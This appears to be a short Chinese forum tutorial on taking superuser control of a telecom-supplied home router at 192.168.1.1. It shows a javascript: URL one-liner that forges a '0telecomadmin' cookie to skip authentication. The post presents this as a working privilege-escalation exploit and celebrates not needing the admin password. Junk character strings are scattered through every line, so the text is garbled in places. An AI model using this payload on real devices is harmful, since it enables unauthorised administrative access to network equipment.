经过分析,这个路由虽然要验证,不过却使用了非常简单的COOKIES认证,也就是说伪造了COOKIES就可以使用高级权限了.2 Y' s. ~7 A# h9 F
好,那么现在开始伪造COOKIES,使用FIREFOX火狐游览器。1 j f, c3 D0 z- b- {" L" a+ `9 e
" ?. @/ l+ P; F首先要使用普通的useradmin登录一次系统,然后退出后保持当前页面不动。
+ P6 ^& v9 U H8 R, W. s9 d8 t$ W在URL里输入我们伪造COOKIES地址3 D. g2 _7 b! t/ s- k; s: x8 E: F
( G: q$ b( p6 {. h
javascript:var the_datea = new Date("December 31, 2020");var expiresDatea = the_datea.toGMTString();document.cookie = "Name=" + "0telecomadmin" + "; expires=" + expiresDatea +"; path=/;domain=192.168.1.1";alert ("write");0 ?! B1 \8 U7 E% b4 ?
: ]8 k& H; X1 t) a- {写入cookies后重新在URL上输入192.168.1.1,直接进入了设置,而且发现了很多只有超级用户才可以设置的部分,这说明我们伪造成功了,管它超级用户的密码是什么,我们也不需要了,呵呵.
# k V1 d5 y5 s& q+ ]& J$ `5 v7 n* R! X) M
$ X4 Y' Z- b6 v& e8 p$ g9 N
|